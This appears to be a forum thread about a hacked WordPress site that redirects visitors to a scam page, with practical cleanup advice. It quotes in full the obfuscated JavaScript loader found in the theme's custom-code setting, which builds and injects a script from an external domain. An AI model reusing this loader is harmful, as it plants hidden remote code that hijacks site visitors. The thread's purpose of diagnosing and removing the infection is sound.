today my client told me that his website automatically redirect to another one external scam website. On first sight no problem in the file directories, and no injections in the fields of the settings.
Wordfence no report any type of warning, but the Avast Antivirus in the client machine report a trojan warning:
"JS:Fakepush-A [Trj]" infection
Wordpress version 5.4.1 Theme: Newspapaer V 6.6.4
Any ideas?
After a closer look I found a portion of code that seemed foreign to the original project, in the theme settings---->Custom Code----->Custom Javascript:
var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}
Removed. After a total cache clean (.js min included) the website don't redirect anymore. Moreover, i think that the theme needs an upgrade.
There are multiple things you need to check.
The redirect that you speak of can be present in header.php, footer.php, any javascript file that loads. Check for malicious files in wp-content/upload folder.
You will need to check database tables as well.
I would recommend installing Wordfence and scanning the site as well.
Once you remove and test it you will need to improve the security of it - check all the plugins are up to date and if any of them have any vulnerabilities. I found this website very useful: https://wpvulndb.com/plugins
